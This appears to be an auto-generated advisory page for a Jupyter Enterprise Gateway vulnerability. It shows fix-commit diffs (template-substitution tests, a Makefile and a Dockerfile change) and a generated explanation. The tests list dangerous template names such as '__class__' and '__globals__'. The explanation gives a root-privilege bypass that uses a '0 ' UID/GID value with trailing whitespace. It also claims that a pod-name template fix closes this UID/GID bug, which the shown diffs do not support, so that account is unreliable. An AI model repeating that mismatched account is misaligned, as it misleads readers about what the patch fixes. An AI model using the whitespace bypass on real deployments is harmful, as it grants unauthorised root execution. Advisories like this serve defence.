    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_pod_name_determination_with_missing_variables(self):
    +        """Test pod name determination with missing variables falls back to default."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ missing_var }}-{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_pod_name_without_template(self):
    +        """Test pod name determination without template syntax."""
    +        kwargs = {"env": {"KERNEL_POD_NAME": "static-pod-name", "KERNEL_NAMESPACE": "production"}}
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should use as-is and DNS-normalize
    +            self.assertEqual(result, "static-pod-name")
    +
    +    def test_pod_name_dns_normalization(self):
    +        """Test DNS name normalization of pod names."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ kernel_namespace }}_{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "Test-Namespace",
    +                "KERNEL_IMAGE": "python:3.9",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should be DNS-normalized (lowercase, dashes only)
    +            self.assertEqual(result, "test-namespace-test-kernel-id")
    +
    +    def test_regex_pattern_validation(self):
    +        """Test that only valid variable names are matched by regex."""
    +        valid_vars = [
    +            "kernel_id",
    +            "kernel_namespace",
    +            "kernel_image_pull_policy",
    +            "a",
    +            "var123",
    +            "KERNEL_ID",
    +        ]
    +
    +        # Variables that should be blocked by the regex pattern
    +        invalid_vars = [
    +            "123invalid",  # starts with number
    +            "invalid-var",  # contains dash
    +            "invalid.var",  # contains dot
    +            "invalid var",  # contains space
    +            "invalid@var",  # contains special char
    +            "_private_var",  # starts with underscore (security risk)
    +            "__class__",  # magic method (security risk)
    +            "__dict__",  # magic method (security risk)
    +            "__globals__",  # magic method (security risk)
    +        ]
    +
    +        variables = {var: "value" for var in valid_vars}
    +        # Also add underscore variables to test they're not substituted even if present
    +        variables.update(
    +            {"_private_var": "private", "__class__": "dangerous", "__dict__": "dangerous"}
    +        )
    +
    +        # Valid variables should be substituted
    +        for var in valid_vars:
    +            template = f"{{{{ {var} }}}}"
    +            result = self.proxy._safe_template_substitute(template, variables)
    +            self.assertEqual(result, "value", f"Valid variable {var} should be substituted")
    +
    +        # Invalid variables should be treated as having invalid syntax
    +        for var in invalid_vars:
    +            template = f"{{{{ {var} }}}}"
    +            with patch.object(self.proxy, 'log') as mock_log:
    +                result = self.proxy._safe_template_substitute(template, variables)
    +                self.assertIsNone(result, f"Invalid variable {var} should be rejected")
    +                mock_log.warning.assert_called_once()
    +                # Should warn about unsupported expressions since invalid var names don't match regex
    +                self.assertIn("Invalid template syntax", mock_log.warning.call_args[0][0])
    +
    +
    +if __name__ == '__main__':
    +    unittest.main()
    
  • Makefile+1 1 modified
    @@ -67,7 +67,7 @@ clean-env: ## Remove conda env
     lint: ## Check code style
     	@pip install -q -e ".[lint]"
     	@pip install -q pipx
    -	ruff .
    +	ruff check .
     	black --check --diff --color .
     	mdformat --check *.md
     	pipx run 'validate-pyproject[all]' pyproject.toml
    
30de39dc5436

Update debian security repository for demo-base docker image

https://github.com/jupyter-server/enterprise_gatewayLuciano ResendeMar 3, 2024Fixed in 3.3.0via ghsa-release-walk
1 file changed · +2 1
  • etc/docker/demo-base/Dockerfile+2 1 modified
    @@ -53,7 +53,8 @@ RUN dpkg --purge --force-depends ca-certificates-java \
         software-properties-common \
         openssh-server \
         openssh-client \
    -    && apt-add-repository 'deb http://security.debian.org/debian-security stretch/updates main' \
    +    && apt-add-repository 'deb http://security.debian.org/debian-security bullseye-security main' \
    +    && apt-add-repository 'deb http://deb.debian.org/debian/ sid main' \
         && apt-get update && apt-get install -yq --no-install-recommends  \
         openjdk-8-jre-headless \
         ca-certificates-java \
    

Vulnerability mechanics

Root cause

"The check for prohibited UIDs and GIDs does not properly sanitize input, allowing bypass via whitespace."

Attack vector

An attacker can bypass the prohibited UID and GID feature by providing a specially crafted `KERNEL_UID` or `KERNEL_GID` value that includes trailing whitespace, such as '0 '. This bypasses the string comparison check in the `container.py` file. The crafted value is then used in the Kubernetes manifest, where the Jinja2 template parsing ignores the whitespace when converting the value to an integer for the `runAsUser` and `runAsGroup` fields. This allows a kernel to be launched with root privileges.

Affected code

The vulnerability lies within the `enterprise_gateway/services/processproxies/container.py` file, specifically in the checks performed against `KERNEL_UID` and `KERNEL_GID` against `prohibited_uids` and `prohibited_gids` respectively. The Kubernetes manifest generation in `etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2` is also involved, as it uses Jinja2 templating to insert these values. The fix is implemented in `enterprise_gateway/services/processproxies/k8s.py` with the introduction of the `_safe_template_substitute` method.

What the fix does

The patch in `k8s.py` introduces a `_safe_template_substitute` method that uses regular expressions to strictly parse template variables. This method ensures that only valid variable names are substituted and rejects any input containing unsupported expressions or characters. The `_determine_kernel_pod_name` function now uses this safer method for processing `KERNEL_POD_NAME`, preventing malicious template injection and ensuring that any invalid template syntax leads to a fallback to the default naming convention. This change effectively closes the vulnerability by properly sanitizing the input before it is used in the Kubernetes manifest.

Preconditions

  • configJupyter Enterprise Gateway must be configured to prohibit UID/GID 0 by default (EG_PROHIBITED_UIDS=0, EG_PROHIBITED_GIDS=0).
  • inputThe attacker must be able to control the KERNEL_UID or KERNEL_GID environment variables when launching a kernel.

Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3

News mentions

0

No linked articles in our index yet.